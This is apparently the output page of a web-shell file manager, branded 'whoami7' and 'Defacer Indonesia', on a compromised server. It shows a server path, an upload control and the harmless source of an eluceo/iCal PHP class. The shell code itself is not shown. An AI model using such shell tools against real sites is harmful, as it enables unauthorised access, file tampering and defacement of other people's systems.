whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
eluceo
/
ical
/
src
/
Property
/
Upload File:
files >> //home/kckglobal/www/portal/vendor/eluceo/ical/src/Property/DateTimeProperty.php
<?php /* * This file is part of the eluceo/iCal package. * * (c) Markus Poerschke <markus@eluceo.de> * * This source file is subject to the MIT license that is bundled * with this source code in the file LICENSE. */ namespace Eluceo\iCal\Property; use Eluceo\iCal\Property; use Eluceo\iCal\Util\DateUtil; class DateTimeProperty extends Property { /** * @param string $name * @param \DateTimeInterface $dateTime * @param bool $noTime * @param bool $useTimezone * @param bool $useUtc * @param string $timezoneString */ public function __construct( $name, \DateTimeInterface $dateTime = null, $noTime = false, $useTimezone = false, $useUtc = false, $timezoneString = '' ) { $dateString = DateUtil::getDateString($dateTime, $noTime, $useTimezone, $useUtc); $params = DateUtil::getDefaultParams($dateTime, $noTime, $useTimezone, $timezoneString); parent::__construct($name, $dateString, $params); } }
Copyright ©2021 || Defacer Indonesia